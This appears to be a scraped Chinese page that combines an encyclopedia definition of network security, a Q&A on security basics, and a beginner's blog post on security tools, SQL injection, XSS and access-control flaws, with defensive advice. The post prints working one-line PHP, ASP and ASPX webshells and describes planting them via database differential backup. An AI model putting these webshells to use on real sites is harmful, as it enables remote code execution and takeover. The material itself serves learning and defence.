网络安全 订阅
网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。 [1]  2020年4月27日,国家互联网信息办公室、国家发展和改革委员会、工业和信息化部、公安部、国家安全部、财政部、商务部、中国人民银行、国家市场监督管理总局、国家广播电视总局、国家保密局、国家密码管理局共12个部门联合发布《网络安全审查办法》,于2020年6月1日起实施 [2]  。 展开全文
网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。 [1]  2020年4月27日,国家互联网信息办公室、国家发展和改革委员会、工业和信息化部、公安部、国家安全部、财政部、商务部、中国人民银行、国家市场监督管理总局、国家广播电视总局、国家保密局、国家密码管理局共12个部门联合发布《网络安全审查办法》,于2020年6月1日起实施 [2]  。
信息
应    用
维护网络系统上的信息安全
外文名
Cyber Security
类    别
网络环境
关    联
计算机、通信、数学、信息安全等
危    机
黑客入侵防不胜防
中文名
网络安全
网络安全概念
网络安全,通常指计算机网络的安全,实际上也可以指计算机通信网络的安全。计算机通信网络是将若干台具有独立功能的计算机通过通信设备及传输媒体互连起来,在通信软件的支持下,实现计算机间的信息传输与交换的系统。而计算机网络是指以共享资源为目的,利用通信手段把地域上相对分散的若干独立的计算机系统、终端设备和数据设备连接起来,并在协议的控制下进行数据交换的系统。计算机网络的根本目的在于资源共享,通信网络是实现网络资源共享的途径,因此,计算机网络是安全的,相应的计算机通信网络也必须是安全的,应该能为网络用户实现信息交换与资源共享。下文中,网络安全既指计算机网络安全,又指计算机通信网络安全。 [3]  安全的基本含义:客观上不存在威胁,主观上不存在恐惧。即客体不担心其正常状态受到影响。可以把网络安全定义为:一个网络系统不受任何威胁与侵害,能正常地实现资源共享功能。要使网络能正常地实现资源共享功能,首先要保证网络的硬件、软件能正常运行,然后要保证数据信息交换的安全。从前面两节可以看到,由于资源共享的滥用,导致了网络的安全问题。因此网络安全的技术途径就是要实行有限制的共享。 [3]  从用户(个人或企业)的角度来讲,其希望: [3]  (1)在网络上传输的个人信息(如银行账号和上网登录口令等)不被他人发现,这就是用户对网络上传输的信息具有保密性的要求。 [3]  (2)在网络上传输的信息没有被他人篡改,这就是用户对网络上传输的信息具有完整性的要求。 [3]  (3)在网络上发送的信息源是真实的,不是假冒的,这就是用户对通信各方提出的身份认证的要求。 [3]  (4)信息发送者对发送过的信息或完成的某种操作是承认的,这就是用户对信息发送者提出的不可否认的要求。 [3]  从网络运行和管理者的角度来讲,其希望本地信息网正常运行,正常提供服务,不受网外攻击,未出现计算机病毒、非法存取、拒绝服务、网络资源非法占用和非法控制等威胁。从安全保密部门的角度来讲,其希望对非法的、有害的、涉及国家安全或商业机密的信息进行过滤和防堵,避免通过网络泄露关于国家安全或商业机密的信息,避免对社会造成危害,对企业造成经济损失。从社会教育和意识形态的角度来讲,应避免不健康内容的传播,正确引导积极向上的网络文化。 [3]  网络安全在不同的应用环境下有不同的解释。针对网络中的一个运行系统而言,网络安全就是指信息处理和传输的安全。它包括硬件系统的安全、可靠运行,操作系统和应用软件的安全,数据库系统的安全,电磁信息泄露的防护等。狭义的网络安全,侧重于网络传输的安全。 [3]  网络传输的安全与传输的信息内容有密切的关系。信息内容的安全即信息安全,包括信息的保密性、真实性和完整性。 [3]  广义的网络安全是指网络系统的硬件、软件及其系统中的信息受到保护。它包括系统连续、可靠、正常地运行,网络服务不中断,系统中的信息不因偶然的或恶意的行为而遭到破坏、更改或泄露。 [3]  其中的信息安全需求,是指通信网络给人们提供信息查询、网络服务时,保证服务对象的信息不受监听、窃取和篡改等威胁,以满足人们最基本的安全需要(如隐秘性、可用性等)的特性。网络安全侧重于网络传输的安全,信息安全侧重于信息自身的安全,可见,这与其所保护的对象有关。 [3]  由于网络是信息传递的载体,因此信息安全与网络安全具有内在的联系,凡是网上的信息必然与网络安全息息相关。信息安全的含义不仅包括网上信息的安全,而且包括网下信息的安全。现在谈论的网络安全,主要是是指面向网络的信息安全,或者是网上信息的安全。 [3] 
收起全文
精华内容
参与话题
问答
  • 网络安全基础知识

    万次阅读 多人点赞 2018-09-28 15:32:16
    1、什么是防火墙?什么是堡垒主机?什么是DMZ? 防火墙是在两个网络之间强制实施访问控制策略的一个系统或一组系统。 堡垒主机是一种配置了安全防范措施的网络上的计算机,堡垒主机为...网络安全从其本质上来讲...

    1、什么是防火墙?什么是堡垒主机?什么是DMZ?

    防火墙是在两个网络之间强制实施访问控制策略的一个系统或一组系统。

    堡垒主机是一种配置了安全防范措施的网络上的计算机,堡垒主机为网络之间的通信提供了一个阻塞点,也可以说,如果没有堡垒主机,网络间将不能互相访问。

    DMZ成为非军事区或者停火区,是在内部网络和外部网络之间增加的一个子网。

     

    2、网络安全的本质是什么?

    网络安全从其本质上来讲是网络上的信息安全。

    信息安全是对信息的保密性、完整性、和可用性的保护,包括物理安全、网络系统安全、数据安全、信息内容安全和信息基础设备安全等。

     

    3、计算机网络安全所面临的威胁分为哪几类?从人的角度,威胁网络安全的因素有哪些?

    答:计算机网络安全所面临的威胁主要可分为两大类:一是对网络中信息的威胁,二是对网络中设备的威胁。从人的因素考虑,影响网络安全的因素包括:

    (1)人为的无意失误。

    (2)人为的恶意攻击。一种是主动攻击,另一种是被动攻击。

    (3)网络软件的漏洞和“后门”。

     

    4、网络攻击和防御分别包括那些内容?

    网络攻击:网络扫描、监听、入侵、后门、隐身;

    网络防御:操作系统安全配置、加密技术、防火墙技术、入侵检测技术。

     

    5、分析TCP/IP协议,说明各层可能受到的威胁及防御方法。

    网络层:IP欺骗攻击,保护措施;防火墙过滤、打补丁;

    传输层:应用层:邮件炸弹、病毒、木马等,防御方法:认证、病毒扫描、安全教育等。

     

    6、请分析网络安全的层次体系

    从层次体系上,可以将网络安全分成四个层次上的安全:物理安全、逻辑安全、操作系统安全和联网安全。

     

    7、请分析信息安全的层次体系

    信息安全从总体上可以分成5个层次:安全的密码算法,安全协议,网络安全,系统安全以及应用安全。

     

    8、简述端口扫描技术的原理

    端口扫描向目标主机的TCP/IP服务端口发送探测数据包,并记录目标主机的相应。通过分析相应来判断服务端口是打开还是关闭,就可以知道端口提供的服务或信息。端口扫描可以通过捕获本地主机或服务器的注入/流出IP数据包来监视本地主机运行情况。端口扫描只能对接受到的数据进行分析,帮助我们发现目标主机的某些内在的弱点,而不会提供进入一个系统的详细步骤。

     

    9、缓冲区溢出攻击的原理是什么?

    缓冲区溢出攻击是一种系统的攻击手段,通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其他指令,以达到攻击的目的。

    缓冲区溢出攻击最常见的方法是通过使某个特殊的程序的缓冲区溢出转而执行一个shell,通过shell的权限可以执行高级的命令。如果这个特殊程序具有system权限,攻击成功者就能获得一个具有shell权限的shell,就可以对程序进行操控。

     

    10、列举后门的三种程序,并阐述其原理和防御方法。

    (1)远程开启TELNET服务。防御方法:注意对开启服务的监护;

    (2)建立WEB和TELNET服务。防御方法:注意对开启服务的监控;

    (3)让禁用的GUEST用户具有管理权限。防御方法:监护系统注册表。

     

    11、简述一次成功的攻击,可分为哪几个步骤?

    隐藏IP-踩点扫描-获得系统或管理员权限-种植后门-在网络中隐身。

     

    12、简述SQL注入漏洞的原理

    利用恶意SQL语句(WEB缺少对SQL语句的鉴别)实现对后台数据库的攻击行为。

     

    13、分析漏洞扫描存在问题及如何解决

    (1)系统配置规则库问题存在局限性

    如果规则库设计的不准确,预报的准确度就无从谈起;

    它是根据已知的是安全漏洞进行安排和策划的,而对网络系统的很多危险的威胁确实来自未知的漏洞,这样,如果规则库更新不及时,预报准确度也会相应降低;

    完善建议:系统配置规则库应能不断地被扩充和修正,这样是对系统漏洞库的扩充和修正,这在目前开将仍需要专家的指导和参与才能实现。

    (2)漏洞库信息要求

    漏洞库信息是基于网络系统漏洞库的漏洞扫描的主要判断依据。如果漏洞库

    完善建议:漏洞库信息不但应具备完整性和有效性,也应具备简易性的特点,这样即使是用户自己也易于对漏洞库进行添加配置,从而实现对漏洞库的及时更新。

     

    14、按照防火墙对内外来往数据的处理方法可分为哪两大类?分别论述其技术特点。

    按照防护墙对内外来往数据的处理方法,大致可以分为两大类:包过滤防火墙和应用代理防火墙。

    包过滤防火墙又称为过滤路由器,它通过将包头信息和管理员设定的规则表比较,如果有一条规则不允许发送某个包,路由器将其丢弃。

    在包过滤系统中,又包括依据地址进行过滤和依据服务进行过滤。

    应用代理,也叫应用网关,它作用在应用层,其特点是完全“阻隔”了网络的通信流,通过对每个应用服务编制专门的代理程序,实现监视和控制应用层通信流的作用。

    代理服务器有一些特殊类型,主要表现为应用级和回路级代理、公共与专用代理服务器和智能代理服务器。

     

    15、什么是应用代理?代理服务有哪些优点?

    应用代理,也叫应用网关,它作用在应用层,其特点是完全“阻隔”了网络的通信流,通过对每种应用服务编制专门的代理程序,实现监视和控制应用层通信流的作用。

    代理服务器有以下两个优点:

    (1)代理服务允许用户“直接”访问互联网,采用代理服务,用户会分为他们是直接访问互联网。

    (2)代理服务适合于进行日志记录,因为代理服务遵循优先协议,他们允许日志服务以一种特殊且有效的方式来进行。

     

    参考地址:https://wenku.baidu.com/view/e2f774db84868762caaed5e7.html

    展开全文
  • 2019网络安全超详细入门教程

    万人学习 2019-06-27 15:14:04
    从零基础快速入门网络安全,一套课程带你掌握网络安全技术。侧重实际操作。
  • 最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常...

    最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常基础的文章,大神请飘过,谢谢各位看官!

    投票闲谈:
    最后希望大家帮我2019年CSDN博客之星投投票,每天可以投5票喔,谢谢大家!八年,在CSDN分享了410篇文章,15个专栏,400多万人次浏览,包括Python人工智能、数据挖掘、网络爬虫、图象处理、网络安全、JAVA网站、Android开发、LAMP/WAMP、C#网络编程、C++游戏、算法和数据结构、面试总结、人生感悟等。当然还有我和你的故事,感恩一路有你,感谢一路同行,希望通过编程分享帮助到更多人,也希望学成之后回贵州教更多学生。因为喜欢,所以分享,且看且珍惜,加油!等我四年学成归来~

    投票地址:http://m234140.nofollow.ax.mvote.cn/opage/ed8141a0-ed19-774b-6b0d-39c3aaf89dde.html?from=singlemessage

    在这里插入图片描述

    下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study
    百度网盘:https://pan.baidu.com/s/1dsunH8EmOB_tlHYXXguOeA 提取码:izeb

    前文欣赏:
    [渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
    [渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
    [渗透&攻防] 三.数据库之差异备份及Caidao利器
    [渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包


    一.工具&术语

    1.网安术语

    常见安全网站及论坛:

    • 看雪(https://bbs.pediy.com/)
    • 安全客(https://www.anquanke.com)
    • freebuf(https://www.freebuf.com/)
    • 安全牛(https://www.aqniu.com/)
    • 安全内参(https://www.secrss.com/)
    • 绿盟(http://www.nsfocus.com.cn/)
    • 先知社区(https://xz.aliyun.com/)

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    基础知识:

    风险评估
    1)渗透测试技术:踩点扫描探测、信息收集、暴力解决、漏洞扫描、Web权限获取、Web提权、溢出攻击、植入后门、内网渗透等。
    2)安全漏洞的代码审计和代码加固技术:缓冲区溢出、拒绝服务、远程命令执行、注入、跨站、Web提权。

    安全防护
    1)中间件和Web应用的安全监测与防护方法:框架漏洞、权限绕过、弱口令、注入、跨站、文件包含、文件上传、命令执行、任意文件读取和下载等。
    2)主流厂商网络安全设备的调试与配置;主流数据库系统的补丁、账号管理、口令强度、有效期检查、远程服务、存储过程、审核层次、备份过程、用户功能和权限控制等基础技术;数据库库内库外加密、硬件加密、数据库审计技术;操作系统安全管理、客户端访问控制、入侵检测技术、数据异地灾备等技术。
    3)主机操作系统和应用软件的安全配置、主机运行的应用程序、正常运行所需端口,服务的正确配置,涉及系统安全风险测试、文件系统、关键数据、配置信息、口令用户权限等内容。

    应急响应
    1)应急响应相关技术:入侵取证分析、日志审计分析等。
    2)操作系统常规安全防护技术:利用系统日志、应用程序日志等溯源共计途径,系统账号、文件系统、网络参数、服务、日志审计等项目安全监测与安全加固方法。
    3)网络设备和安全设备的功能及使用方法:路由器、交换机、防火墙、入侵检测系统、拒绝服务供给系统、网页防篡改系统、漏洞扫描系统等。

    安全加固
    1)操作系统(Windows、Linux、Unix、Mac)的常规安全防护技术:利用系统日志、应用程序日志等溯源攻击途径,统账号、文件系统、网络参数、服务、日志审计等项目安全监测与安全加固方法。
    2)Webcms、中间件、数据库等常规用Web应用的加固知识,应用防火墙、IPS、IDS等安全设备进行辅助加固措施。

    大数据安全
    1)云计算和大数据技术带来的安全问题:虚拟机安全、应用程序安全、大数据安全。
    2)大数据分析技术提升网络系统安全隐患发现和防护能力。

    物联网安全
    1)ID/IC卡的安全漏洞检测和发现技术,智能卡常见加密算法。
    2)物联网应用环境中典型安全攻击:RFID攻击等。
    3)无线安全、硬件安全等知识。

    其他
    1)密码学概念、加密算法、加密分析工具。
    2)网络攻击原理及常见网络攻击协议,数据包分析工具。
    3)Web攻击种类及常见的Web利用方式,注入攻击类型及方式。
    4)漏洞产生原因、漏洞的利用与防护方式。
    5)恶意代码、逆向工程、沙箱保护。
    6)移动互联网恶意程序检测与处置机制,移动逆向分析与代码审计技术、移动安全防护。
    7)数据恢复常用技术及工具。
    8)工业控制系统、工控漏洞及加固分析、工控漏洞玩、工控安全仿真及蜜罐、工控系统上位机及应用安全等。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    常见攻击手段:

    • 扫描
    • 爆破
    • 溢出
    • 木马病毒
    • Web攻击
    • 无线攻击
    • VPN劫持
    • Kali攻击
    • MAC泛洪攻击
    • 时钟攻击

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    常见术语:

    • 0day
    • 动态分析、静态分析
    • 逆向分析
    • PE文件
    • 注册回调
    • HOOK技术
    • 注入技术
    • 加壳、脱壳、加花
    • 社会工程学
    • 供应链渗透
    • SAM哈希暴力
    • 彩虹表
    • 数据取证
    • 可信计算

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    下面分享2019年看雪安全峰会的几张图,与君共勉。
    CSDN和看雪都已经20年了,这些年见证了无数技术更新,博友不断成长。


    2.常用工具

    Burpsuite

    Burpsuite是用于攻击web应用程序的集成平台,包含了许多工具。Burpsuite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。通常利用Burpsuite抓包分析,寻找Web漏洞。

    手机APP渗透两种思路:
    (1) 电脑浏览器打开链接,burpsuite抓包,修改user-Agent的内容。一般是判断user-Agent里有没有MicroMessenger(适合没有做重定向,或者重定向不加token验证)。
    (2) 做了重定向,加token验证。手机和电脑同在一个局域网下,设置电脑为手机代理,用burpsuite抓包。设置了电脑代理手机的情况下,电脑相当于一层网关,自然抓取的到。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    Fiddler
    Fiddler是位于客户端和服务器端的HTTP代理,也是目前最常用的http抓包工具之一 。 它能够记录客户端和服务器之间的所有 HTTP请求,可以针对特定的HTTP请求,分析请求数据、设置断点、调试web应用、修改请求的数据,甚至可以修改服务器返回的数据,功能非常强大,是web调试的利器。

    Fiddler是用C#写出来的,它包含一个简单却功能强大的基于JScript .NET 事件脚本子系统,它的灵活性非常棒,可以支持众多的http调试任务,并且能够使用.net框架语言进行扩展。安装前需安装microsoft .net framework可执行文件。

    手机渗透:可以尝试抓取微信浏览器中的结构头,接着通过fiddler的方式,在用第三方(360、QQ、谷歌等)打开的时候,所有数据都会经过fiddler,将该结构修改即可。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    SQLMAP
    SQLMAP是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    OllyDbg
    OLLYDBG是一个新的动态追踪工具,将IDA与SoftICE结合起来的思想,Ring 3级调试器,非常容易上手,己代替SoftICE成为当今最为流行的调试解密工具了。同时还支持插件扩展功能,是目前最强大的调试工具。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    IDA Pro
    交互式反汇编器专业版(Interactive Disassembler Professional),是目前最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode安全分析人士不可缺少的利器。IDA Pro是一款交互式的,可编程的,可扩展的,多处理器的,交叉Windows或Linux WinCE MacOS平台主机来分析程序, 被公认为最好的花钱可以买到的逆向工程利器。IDA Pro已经成为事实上的分析敌意代码的标准并让其自身迅速成为攻击研究领域的重要工具。它支持数十种CPU指令集其中包括Intel x86,x64,MIPS,PowerPC,ARM,Z80,68000,c8051等等。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    pangolin
    Pangolin(中文译名为穿山甲)一款帮助渗透测试人员进行Sql注入测试的安全工具,是深圳宇造诺赛科技有限公司(Nosec)旗下的网站安全测试产品之一。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    Caidao
    Caidao软件据说是一个桂林退役士兵写的,真的很厉害。它是一款Webshell管理工具,支持各种语言,常见的包括ASP、ASPX、PHP、JSP、CFM等,后面希望自己也能深入研究攻防底层内容。目前,Caidao已经被中国蚁剑和冰蝎Behinder取代。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    中国蚁剑
    中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国蚁剑采用了Electron作为外壳,ES6作为前端代码编写语言,搭配Babel&Webpack进行组件化构建编译,外加iconv-lite编码解码模块以及superagent数据发送处理模块还有nedb数据存储模块,组成了这个年轻而又充满活力的新一代利器。

    它包括的功能有端口扫描、Socks代理、反弹Shell、内网漏洞扫描、内网代理浏览器、内网漏洞溢出测试、后门扫描、密码爆破、打包下载、交互式终端、权限提升。
    GitHub上蚁剑搜AntSword:https://gitee.com/mirrors/antSword

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    冰蝎Behinder
    地址:https://github.com/rebeyond/Behinder

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    差异备份

    数据备份主要分位完全备份、增量备份和差异备份。其中差异备份是指备份自上一次完全备份之后有变化的数据,在差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,即备份后不标记为已备份文件,不清除存档属性。

    整体流程是先备份日志,然后插入一句话Muma;再次备份时,数据库只会备份两次间隔中的差异,使得生成出来的文件尽可能小,故称为“差异备份”。

    一句话木马是:

    <?php substr(md5($_REQUEST[*x*]),28)==*acd0*&&eval($_REQUEST[*abc*]);?>
    

    一句话木马插入到数据库表的a字段中,执行接收自定义Sh参数,类似于URL的Code参数,相当于是一个侧门,第二部分Caidao会使用到。

    asp:
       <%execute(request("value"))%>
    php:
       <?php @eval($_POST[value]);?>
    aspx:
       <%eval(Request.Item["value"])%>
    

    3.推荐文章

    看雪 渗透入门——HackInOS
    HackinOS是一个渗透靶机,模拟真实的渗透环境,方便我们练习渗透方法。

    CSDN鬼手56大神网络安全6个专栏文章
    开源一个自写的病毒技术工具:https://blog.csdn.net/qq_38474570/article/details/87707942

    CSDN谢公子大神安全专栏

    CSDN刘焕勇大神老师NLP、知识图谱系列文章
    自然语言处理界的小螺丝钉:https://blog.csdn.net/lhy2014/article/details/82954509
    Github:https://github.com/liuhuanyong

    博客园sch01ar大神逆向工程的文章
    实验吧CTF题库-WEB题(部分): https://www.cnblogs.com/sch01ar/p/7996159.html

    CSDN博友whatiwhere逆向工程文章
    IDA Pro使用初探:https://blog.csdn.net/whatiwhere/article/details/81610539
    逆向基础知识:https://blog.csdn.net/whatiwhere/article/details/80158293

    CSDN博友caiqiiqi大神的Android Q逆向文章
    逆向初体验之玩“英语趣配音”:https://blog.csdn.net/caiqiiqi/article/details/47832473

    黑客是怎样入侵你的网站的 - Flamingo大神
    http://www.freebuf.com/articles/web/7359.html

    看雪论坛Web普及文章
    勒索病毒WannaCry深度技术分析:https://bbs.pediy.com/thread-217662.htm
    Web基础设施知识及安全攻防:https://bbs.pediy.com/thread-199199.htm
    Discuz!ML V3.2代码执行漏洞复现:https://bbs.pediy.com/thread-252603.htm
    内网渗透小记:https://bbs.pediy.com/thread-192778.htm


    二.常见攻击

    感谢汤神的分享,推荐大家阅读下面两篇原文,这里主要是学习看雪论坛分享的知识,也作为自己网络安全的入门文章,如果读者觉得这部分不好或侵权,作者可以删除。

    浅析WEB安全编程:https://bbs.pediy.com/thread-222922.htm
    XSS跨站总结:https://bbs.pediy.com/thread-196518.htm

    代码注入、CSRF、0元支付、短信轰炸这些都是非常常见的漏洞,这里简单解释这些名词。

    1.SQL注入

    汤神从漏洞成因,攻击方式以及防御方案三个方面讲解SQL注入。漏洞成因我们可以用这两句话,使用用户参数拼接这个SQL语句,这个参数改变了原有的SQL结构,改变了这个SQL的注入。
    下图左边这是一个数据库,白色部分的字体是我们在代码中写到的SQL结构,黑色部分就是攻击者可能会传入的参数(‘1’='1’始终成)。当我们把这个SQL结构拼接出来之后形成了一个新的结构,这个结构被执行之后把整张表所有的数据传输出来,数据库比较大的访问更多请求,整个可能就挂了,还造成一些数据泄漏的情况,这些就是SQL的注入成因,参数改变了原有的SQL结构。

    攻击者通常有哪几种攻击方式?
    汤神把它分为了三种类型:一种是回显注入,一种是报错注入,一种是盲注。

    回显注入
    利用注入漏洞可以改变页面返回数据,则称之为回显注入。
    第一张图是传入ID是正常的正型数字,返回的结果是用户的一个信息传入ID等于1,上面URL把这个参数修改了一下,等于1,然后加了 or 1=‘1,当它拼接到之后,跟前面一样把整个表的数据传输出来,这边看到整个用户表的数据都被列举出来了。利用漏洞可以改变这个页面的数据我们叫做回显注入,这个黑客可以直接把这个数据下载下来。

    报错注入
    下图非常清楚看到,URL上面这个部分是正常URL加上攻击者所利用的攻击代码。其实这上面的攻击代码也是执行不了,但放到数据库中,最后会造成数据库返回异常码,并把异常码抛出来,接着这个用户名(act_admin 10.59.107.125)就被展示出来了。这是非常敏感的信息,我们写代码的时候需要把数据库抛出来的错误屏蔽,不让其在前台显示出来,通过报错显示了一些敏感信息,我们称之为报错注入。

    盲注
    盲注和回显注入以及报错注入不一样,我们没有办法通过页面数据看到它的区别。可以通过两种方式实现盲注——布尔盲注和时间盲注。下图中绿色部分是正常URL,红色部分是布尔注入的表示式,前面加一个and截取一个字符,判断一下id的第一个字符是不是大于字母a。
    如果成立则整个条件都成立,这个时候页面是有反馈数据的;如果不成立这个页面就不返回数据,这就是布尔数据。我们可以看到有数据和没有数据的情况,当字母a不断变换的时候,也可以把这个数据库里面的数据猜测出来。

    时间盲注是下面蓝色区域部分,我们知道数据库里面可以用一些IF函数,也是截取第一个字符,如果这个不成立就到五秒钟返回,通过这个页面返回的时间可以判断这个地方是不是有注入的,也可以把这个数据都给下载下来。

    刚刚说到攻击者碰到的三种攻击方式,下面看一下怎么样检测页面当中有没有注入点?我们通过SQLMAP实现,可以看到这是一个CMD窗口,上面是写到的检测表达式,Splmap.py以及需要检测的UI,需要有这个注册点它会告诉你有哪些注入,比如说这个页面是在本地测试的结果,它就告诉了有回显注入、错误注入以及一些盲注。

    SQLMAP用法推荐秀璋的另一篇文章:[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法

    呢么,怎么样防范服务器的安全呢?

    第一种方法是拦截带有SQL语法的参数的传入。参数会改变SQL的结构,当我们知道这个参数是整型的时候,就把这个参数转型为整型,整型肯定不包括这个SQL结构,无法改变结构,哪就不存在SQL注入。

    第二种方法是通过预编译处理拼接参数的SQL语句。有的时候我们无法预测它传什么参数,比如我们去论坛回复一个帖子,肯定没有办法控制,这个时候我们可以用PDO预处理,这是最常见的方法,也是一个最好的方法。但有时我们会写一些复杂社会语句,会用第一种方法,我们先定义好这个SQL语句结构,再把参数放进去,这个时候是无法达到更改SQL语句处理的目的。

    第三个方法是定期分析数据库执行日志,判断是否有异常SQL执行。当业务比较大的时候,日志是非常多的,可以找一些SQL的取模软件进行取模,取模之后并不太多,如果直接看的话是海量日志,是没法看的。


    2.XSS跨站

    跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。

    XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、 Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

    主要从漏洞成因、攻击场景和防御方法三方面讲解。

    如上图所示,上面有一个URL,下面是一个页面返回的HTML代码,我们可以看到白色部分HTML是我们事先定义好,黑色部分参数是用户想搜索的关键词。当我们搜索了test+Div最后等于123,对后反馈页面一般搜索会告诉你用户搜索了什么关键词,结果如何等等。

    这个地方如果没有做好转移,可能会造成XSS跨站,我们可以看到蓝色部分是我们事先定义好的结构,被攻击者利用之后它先把这个DIV结束了,最后加上一个script标签,它也有可能不跟你谈标签,直接发送到它的服务器上。参数未经过安全过滤,然后恶意角本被放到网页当中执行,用户浏览的时候执行了这个脚本。

    漏洞原因即为:

    XSS分为三种类型——反射型、存储型以及DOM型。

    反射型
    下图是专门训练一些WEB漏洞的练习页面,我们可以输入自己的名字,输入之后会把我们的名字显示出来。例如我们输入了一个“张三”,这个时候弹出来了一个“123”,在那边显示了一个张三,但是script标签没有出来,因为这个标签被执行了。

    存储型
    在存储型XSS中,可以看到这个URL上面并没有代码,但是依然弹出了一个“1”。它是发现个人资料页的时候有一个XSS漏洞,在个性签名的位置填入了一个XSS标签,弹出了一个“1”,把这个地址发给别人,别人看到这个地址并没有什么代码以为这个页面是安全的,结果一打开就插入了这个XSS代码。

    存储型XSS的攻击危害比较大,因为它的页面当中是看不到这个Script的代码,别人防不胜防。只要管理员没有发现,下一个用户或者下一个用户一直接发它,而反射型需要用户主动点击的。

    DOM型
    Dom型的XSS是一些有安全意识的开发者弄出来的。比如说接受参数会做一些过滤,把一些字符转义一下,但是转义之后依然会存在着XSS的情况,比如说下图中,我们上面输入的可以看到这行代码规律,把这个大括号、小括号以及双页号进行转移,按理说转移之后它应该不会再作为它的标签存在,不会存在XSS的代码。

    下面Script通过ID获得的这个值,复制到了这个DIV上,经过DOM操作之后,之前转义的字符就变为它的标签,所以经过DOM操作的XSS我们称之为DOMXSS。它有可能通过URL传播,也有可能通过服务器的传播。

    最后给出一些编码的防范措施。

    第一是标签黑白名单过滤。有时根本就不需要考虑到它是不是HTML标签,我们根本用不到HTML标签。

    第二是代码实体转义。只保留文字部分这是一劳永逸的,有时我们还是需要展示这个标签,比如说程序论坛当中要贴一个代码,这个时候我们需要用一些转义,它会把这个大括号、小括号以及双引号做一个转义,做为一个字符,就无法执行这个标签型,后面加一个参数,但有时候单引号也会造成XSS。

    第三是httponly防止cookie被盗取。一个信号当中有那么多的地方存在着这个输入以及检测的地方,可能就有一些地方漏掉,只要有一个地方漏掉了,用户的cookie信息就被盗取了。服务器在发送用户信息的时候,我们需要加上一个httponly,这个代码无法读取到cookie的信息,那么攻击者也是得不到这个信息的。对于用户来说也是非常好的保护。比如说张三在我们网站上登陆了一下用户名,李四他特意发了一个攻击请求,他拿不到这个用户ID,就冒充不了这个张三。

    如果在Cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到Cookie信息,这样能有效的防止XSS攻击


    3.越权漏洞

    我们再来看看越权漏洞,在一些系统当中如果存在着多种用户角色,每一种角色有不同的权限。操作业务适合如果权限不严格可能会发生越权漏洞。越权分为垂直越权和平行越权,其产生原因包括:
    1)业务系统存在用户权限验证
    2)对用于的权限验证不严谨
    3)用户能操作不属于自己权限的操作

    平行越权
    在WEB系统中有商城,这个商城中必不可少的就有订单,订单肯定有一个店铺ID,我们通常把它设置为一个自增长的ID,这个ID是一个数字类型。在URL上面如果有一个订单ID就是100,攻击者会尝试100+1,当它ID等于101或者99的时候能否访问到。

    如果能访问到并且这个订单信息不是我的,这个地方就存在着一个漏洞。张三可以看到李四的订单信息,这个时候就存在着越权。张三和李四是平级的用户,他们两个权限是一样,互相可以看到平台信息这叫做平行越权。

    这个有什么危害呢?
    比如说这个网站有漏洞,如果是竞争对手他就可以知道用户在我的平台上下过订单的行为,然后去营销。如果把这个订单ID直接暴露出来,还有一种可能就是竞争对手会根据我们的订单IP的增长量,判断我们的增长量,就知道我们一天到底有多少订单。

    平行越权防御方法:我们查询的时候必须加上当前用户的ID,就是orderID加上UID,这样不会出现张三可以看到李四的订单了。

    垂直越权
    接下来我们再看一下垂直越权,这是一个普通用户进入到后台管理系统中,他的权限就扩大化了。通常这种情况下,后台会集成到更多的控制器来统一管理,但依然有一些邮件会漏掉并没有集成到,就会发生这种情况。

    黑客不会一个一个找,会通过一些扫描器发现漏洞进去。建议不要把自增长ID暴露出来,可以做对称加密或者非对称加密,先转换为一个字母类型,让别人看不到你的数字型的ID是多少。别人就没有办法通过这个加一减一的方式越权,也看不到你的一天业务增长量。

